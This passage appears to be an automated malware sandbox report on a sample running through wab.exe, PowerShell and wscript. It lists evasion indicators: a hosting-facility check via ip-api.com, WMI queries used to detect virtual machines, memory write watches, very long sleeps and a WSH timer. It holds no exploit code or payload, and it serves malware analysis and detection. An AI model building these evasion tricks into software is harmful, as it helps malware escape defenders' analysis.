Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Allocates memory with a write watch (potentially for evading sandboxes)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 22350000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Memory allocated: 24350000 memory reserve \| memory write watch	Jump to behavior

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598727	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598604	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598373	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597936	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597816	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597524	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597355	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594170	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593947	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592780	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592329	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592204	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592079	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591954	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591704	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591579	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591235	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591110	Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4936	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4913	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6469	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3327	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 3539	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 6187	Jump to behavior

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\wscript.exe TID: 7336	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7604	Thread sleep time: -4611686018427385s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7992	Thread sleep count: 6469 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7980	Thread sleep count: 3327 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056	Thread sleep count: 3539 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 2056	Thread sleep count: 6187 > 30	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599655s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599546s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599328s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -599110s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598985s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598856s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598727s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598604s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598497s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598373s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598156s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597936s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597816s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597688s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597524s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -597355s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -596875s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594532s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594391s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594281s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594170s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -594063s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593947s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593829s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593688s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593219s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593109s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -593000s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592891s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592780s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592672s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592563s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592438s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592329s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592204s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -592079s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591954s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591829s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591704s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591579s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591453s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591344s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591235s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 4040	Thread sleep time: -591110s >= -30000s	Jump to behavior

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\Windows Mail\wab.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599655	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599546	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599328	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 599110	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598985	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598856	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598727	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598604	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598497	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598373	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598156	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597936	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597816	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597524	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 597355	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 596875	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594532	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594391	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594281	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594170	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 594063	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593947	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 100000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593688	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593453	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593344	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593219	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593109	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 593000	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592891	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592780	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592672	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592563	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592438	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592329	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592204	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 592079	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591954	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591829	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591704	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread delayed: delay time: 591579	Jump to behavior
